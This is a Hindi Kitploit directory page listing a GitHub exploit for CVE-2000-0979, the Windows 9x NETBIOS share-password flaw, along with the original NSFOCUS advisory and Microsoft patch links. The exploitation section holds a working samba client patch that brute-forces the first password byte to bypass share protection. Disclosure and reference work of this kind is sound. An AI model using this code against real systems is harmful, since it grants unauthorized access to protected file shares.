Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/z6543/cve-2000-0979
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

रिपॉजिटरी देखें
226 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2000-0979

CVE-2000-0979.rb विंडोज 95 SMB सेवा के विरुद्ध CVE-2000-0979 का शोषण करने के लिए स्टैंडअलोन टूल है।

msf_2000_0979.rb मेटास्प्लॉइट मॉड्यूल है। आप इसे यहाँ कॉपी कर सकते हैं: ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

जल्द ही और दस्तावेज़ीकरण आ रहा है!

मूल सलाह

NSFOCUS Security Advisory(SA2000-05)

विषय: माइक्रोसॉफ्ट विंडोज 9x NETBIOS पासवर्ड सत्यापन भेद्यता

जारी करने की तिथि: अगस्त 24, 2000 अद्यतन तिथि: अक्टूबर 11, 2000

प्रभावित प्रणाली

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

अप्रभावित प्रणाली

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

प्रभाव

Microsoft Windows 9x NETBIOS प्रोटोकॉल कार्यान्वयन द्वारा उपयोग किए जाने वाले पासवर्ड सत्यापन योजना में एक भेद्यता मौजूद है। यह भेद्यता किसी भी उपयोगकर्ता को पासवर्ड सुरक्षा के साथ Windows 9x फ़ाइल साझा सेवा तक पहुँचने की अनुमति देगी। हमलावर को साझा पासवर्ड जानने की आवश्यकता नहीं है।

विवरण

आप Microsoft Windows 9x सिस्टम के साझा संसाधनों की सुरक्षा के लिए पासवर्ड सेट कर सकते हैं। लेकिन Microsoft Windows 9x NETBIOS प्रोटोकॉल कार्यान्वयन द्वारा उपयोग किए जाने वाले पासवर्ड सत्यापन योजना में एक भेद्यता मौजूद है। पासवर्ड सत्यापित करने के लिए, पासवर्ड की लंबाई क्लाइंट से सर्वर को भेजे गए डेटा की लंबाई पर निर्भर करती है। अर्थात, यदि कोई क्लाइंट पासवर्ड की लंबाई एक बाइट निर्धारित करता है और पैकेट को सादे पाठ पासवर्ड के साथ सर्वर को भेजता है, तो सर्वर इसकी तुलना केवल साझा पासवर्ड (सादा पाठ) के पहले बाइट से करेगा, और यदि संगत है, तो सत्यापन प्रक्रिया पूरी हो जाती है। हमलावर को केवल पीड़ित में पासवर्ड के पहले बाइट का अनुमान लगाने और प्रयास करने की आवश्यकता है। Windows 9x रिमोट प्रबंधन प्रणाली भी प्रभावित है क्योंकि यह उसी साझा पासवर्ड प्रमाणीकरण पद्धति को अपनाती है।

शोषण

इस बग को प्रदर्शित करने के लिए यहाँ एक सरल उदाहरण है। samba स्रोत पैकेज प्राप्त करें और स्रोत/client/client.c को इस प्रकार संशोधित करें:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

समाधान (अस्थायी)

माइक्रोसॉफ्ट फ़ाइल और प्रिंट साझा सेवा बंद करें।

समाधान

Microsoft को सूचित किया गया है और इस दोष के संबंध में एक सुरक्षा बुलेटिन जारी किया गया है।

बुलेटिन इस पर उपलब्ध है:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

पैच निम्नलिखित पर उपलब्ध हैं:

. Microsoft Windows 95

पैच शीघ्र ही उपलब्ध होगा

. Microsoft Windows 98 और 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

अस्वीकरण

प्रदान की गई जानकारी NSFOCUS द्वारा "जैसी है" किसी भी प्रकार की वारंटी के बिना जारी की गई है। NSFOCUS सभी वारंटियों को अस्वीकार करता है, चाहे वे व्यक्त हों या निहित, व्यापारिकता की वारंटियों को छोड़कर। किसी भी स्थिति में NSFOCUS किसी भी क्षति के लिए उत्तरदायी नहीं होगा जिसमें प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक, परिणामी, व्यावसायिक लाभ की हानि या विशेष क्षति शामिल है, भले ही NSFOCUS को ऐसी क्षति की संभावना के बारे में सलाह दी गई हो। जानकारी का वितरण या पुनरुत्पादन इस शर्त पर प्रदान किया जाता है कि सलाह को किसी भी तरह से संशोधित नहीं किया गया है।

?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

टूल डाउनलोड करें